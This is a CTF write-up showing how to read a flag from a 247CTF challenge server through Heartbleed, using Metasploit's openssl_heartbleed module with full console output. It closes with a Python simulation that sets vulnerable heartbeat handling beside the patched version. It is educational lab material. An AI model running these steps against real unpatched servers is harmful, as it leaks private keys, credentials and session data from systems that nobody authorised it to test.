Sensitive Server Memory (misc)

PUBLISHED ON 16/02/2020 — EDITED ON 01/04/2020 — 247CTF, INFOSEC

Intro

This is my write-up of the Misc challenge "Sensitive Server Memory" on the CTF site 247CTF.com.

Instructions

The webserver for this challenge is storing sensitive data in memory. Can you read it? Did anybody patch since 2014?

Howto

The greatest bug of 2014 was Heartbleed, so let's start with that.

Spin up your Kali Linux and enter Metasploit.

kali@kali:~$ msfconsole
[-] Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file

IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v5.0.72-dev                          ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]
msf5 >

Search the module database for anything Heartbleed-related:

msf5 > search heartbleed

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssl/openssl_heartbleed          2014-04-07       normal  Yes    OpenSSL Heartbeat (Heartbleed) Information Leak
   1  auxiliary/server/openssl_heartbeat_client_memory  2014-04-07       normal  No     OpenSSL Heartbeat (Heartbleed) Client Memory Exposure

Select auxiliary/scanner/ssl/openssl_heartbleed (module 0 in the search results):

msf5 > use 0

Check which options need to be set:

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > options

Module options (auxiliary/scanner/ssl/openssl_heartbleed):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DUMPFILTER                         no        Pattern to filter leaked memory before storing
   LEAK_COUNT        1                yes       Number of times to leak memory per SCAN or DUMP invocation
   MAX_KEYTRIES      50               yes       Max tries to dump key
   RESPONSE_TIMEOUT  10               yes       Number of seconds to wait for a server response
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             443              yes       The target port (TCP)
   STATUS_EVERY      5                yes       How many retries until key dump status
   THREADS           1                yes       The number of concurrent threads (max one per host)
   TLS_CALLBACK      None             yes       Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
   TLS_VERSION       1.0              yes       TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)


Auxiliary action:

   Name  Description
   ----  -----------
   SCAN  Check hosts for vulnerability

Set rhosts to the domain provided by the challenge:

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 202f6701de93bfbe.247ctf.com
rhosts => 202f6701de93bfbe.247ctf.com

Set rport to the port provided by the challenge:

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 50071
rport => 50071

Set verbose to true so the module prints the leaked memory instead of only reporting that a leak occurred:

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
verbose => true

Run the module (the SCAN action leaks memory once, since LEAK_COUNT is 1):

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run

[*] 144.76.74.118:50071   - Leaking heartbeat response #1
[*] 144.76.74.118:50071   - Sending Client Hello...
[*] 144.76.74.118:50071   - SSL record #1:
[*] 144.76.74.118:50071   - 	Type:    22
[*] 144.76.74.118:50071   - 	Version: 0x0301
[*] 144.76.74.118:50071   - 	Length:  86
[*] 144.76.74.118:50071   - 	Handshake #1:
[*] 144.76.74.118:50071   - 		Length: 82
[*] 144.76.74.118:50071   - 		Type:   Server Hello (2)
[*] 144.76.74.118:50071   - 		Server Hello Version:           0x0301
[*] 144.76.74.118:50071   - 		Server Hello random data:       20fe119d01d3ac29d5c59761e743d5d48ca8acfd23060efbff11cea2b68c08f7
[*] 144.76.74.118:50071   - 		Server Hello Session ID length: 32
[*] 144.76.74.118:50071   - 		Server Hello Session ID:        44fa4cb2ca1d11afa085d439bd12e8f023e7155f5923c41bf93d8b9b3e64ed82
[*] 144.76.74.118:50071   - SSL record #2:
[*] 144.76.74.118:50071   - 	Type:    22
[*] 144.76.74.118:50071   - 	Version: 0x0301
[*] 144.76.74.118:50071   - 	Length:  821
[*] 144.76.74.118:50071   - 	Handshake #1:
[*] 144.76.74.118:50071   - 		Length: 817
[*] 144.76.74.118:50071   - 		Type:   Certificate Data (11)
[*] 144.76.74.118:50071   - 		Certificates length: 814
[*] 144.76.74.118:50071   - 		Data length: 817
[*] 144.76.74.118:50071   - 		Certificate #1:
[*] 144.76.74.118:50071   - 			Certificate #1: Length: 811
[*] 144.76.74.118:50071   - 			Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name CN=127.0.0.1,OU=infra50,O=247CTF,C=US>, issuer=#<OpenSSL::X509::Name CN=127.0.0.1,OU=infra50,O=247CTF,C=US>, serial=#<OpenSSL::BN:0x0000558d6e19f950>, not_before=2019-02-12 21:20:09 UTC, not_after=2069-01-30 21:20:09 UTC>
[*] 144.76.74.118:50071   - SSL record #3:
[*] 144.76.74.118:50071   - 	Type:    22
[*] 144.76.74.118:50071   - 	Version: 0x0301
[*] 144.76.74.118:50071   - 	Length:  331
[*] 144.76.74.118:50071   - 	Handshake #1:
[*] 144.76.74.118:50071   - 		Length: 327
[*] 144.76.74.118:50071   - 		Type:   Server Key Exchange (12)
[*] 144.76.74.118:50071   - SSL record #4:
[*] 144.76.74.118:50071   - 	Type:    22
[*] 144.76.74.118:50071   - 	Version: 0x0301
[*] 144.76.74.118:50071   - 	Length:  4
[*] 144.76.74.118:50071   - 	Handshake #1:
[*] 144.76.74.118:50071   - 		Length: 0
[*] 144.76.74.118:50071   - 		Type:   Server Hello Done (14)
[*] 144.76.74.118:50071   - Sending Heartbeat...
[*] 144.76.74.118:50071   - Heartbeat response, 65535 bytes
[+] 144.76.74.118:50071   - Heartbeat response with leak, 65535 bytes
[*] 144.76.74.118:50071   - Printable info leaked:
############## FLAG in the leaked data
[*] 202f6701de93bfbe.247ctf.com:50071 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) >

Bingo!
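The 65535-byte heartbeat response above is the bug itself: the server echoes back as many bytes as the client's heartbeat request claims to carry, without checking that claim against the size of the record it actually received, so the copy runs past the request into neighbouring process memory. The following Python simulation is an added example, not part of the original write-up or of the Metasploit module, that places the pre-fix and post-fix heartbeat handling (RFC 6520 message layout, OpenSSL's added length checks) side by side over a constructed in-memory buffer with a made-up secret placed next to the record. The function names, the `make_record`/`simulate` helpers and the secret string are assumptions for illustration.

```python
import struct

# Constants from RFC 6520 (TLS Heartbeat extension)
HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
MIN_PADDING = 16           # padding_length MUST be at least 16 bytes
HEADER_LEN = 1 + 2         # HeartbeatMessageType + payload_length


def vulnerable_heartbeat(buffer, record_length):
    """Simulation of the pre-fix logic: the sender's payload_length field is
    trusted and used as the copy length, so a short record with a large
    claimed length reads past the record into whatever follows it in
    `buffer`. record_length is accepted but never consulted, which is the bug."""
    msg_type, payload_length = struct.unpack("!BH", buffer[:HEADER_LEN])
    if msg_type != HEARTBEAT_REQUEST:
        return None
    payload = bytes(buffer[HEADER_LEN:HEADER_LEN + payload_length])   # over-read
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_length) + payload


def fixed_heartbeat(buffer, record_length):
    """Post-fix logic: both lengths are checked against the real record length
    before any copy. Returns the response, or None to silently drop the
    message, which is what the patched server does."""
    if HEADER_LEN + MIN_PADDING > record_length:
        return None                       # no room for even an empty payload
    msg_type, payload_length = struct.unpack("!BH", buffer[:HEADER_LEN])
    if msg_type != HEARTBEAT_REQUEST:
        return None
    if HEADER_LEN + payload_length + MIN_PADDING > record_length:
        return None                       # claimed payload exceeds the record
    payload = bytes(buffer[HEADER_LEN:HEADER_LEN + payload_length])
    padding = b"\x00" * MIN_PADDING
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_length) + payload + padding


# Constructed secret that, in the simulation, happens to sit right after the
# heartbeat record in the process's memory (the "sensitive server memory").
SECRET = b"session=abc123; FLAG{constructed-example}"


def make_record(payload, claimed_length):
    """Assumed helper: build a heartbeat request record body. claimed_length
    equal to len(payload) is a well-formed request; anything larger is the
    malformed shape the length checks above exist to reject."""
    return (struct.pack("!BH", HEARTBEAT_REQUEST, claimed_length)
            + payload + b"\x00" * MIN_PADDING)


def simulate(handler, claimed_length):
    """Assumed helper: run one handler over a constructed memory image made of
    the record followed by SECRET, passing the true record length."""
    record = make_record(b"ping", claimed_length)
    memory = bytearray(record + SECRET)
    return handler(memory, len(record))


if __name__ == "__main__":
    # Honest request: both handlers echo the four payload bytes.
    print(vulnerable_heartbeat.__name__, simulate(vulnerable_heartbeat, 4))
    print(fixed_heartbeat.__name__, simulate(fixed_heartbeat, 4))
    # Claimed length larger than the record: the old code leaks SECRET,
    # the fixed code drops the message.
    print(vulnerable_heartbeat.__name__, simulate(vulnerable_heartbeat, 60))
    print(fixed_heartbeat.__name__, simulate(fixed_heartbeat, 60))
```

The two `if` guards in `fixed_heartbeat` are the whole fix: the first rejects records too small to hold a header plus minimum padding, the second rejects any payload_length that would push the copy beyond the record. Detection-wise, the only observable difference between a legitimate heartbeat and a leak attempt is that mismatch between claimed and actual length, which is why a server that still answers with far more bytes than it was sent is the tell the Metasploit module keys on.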
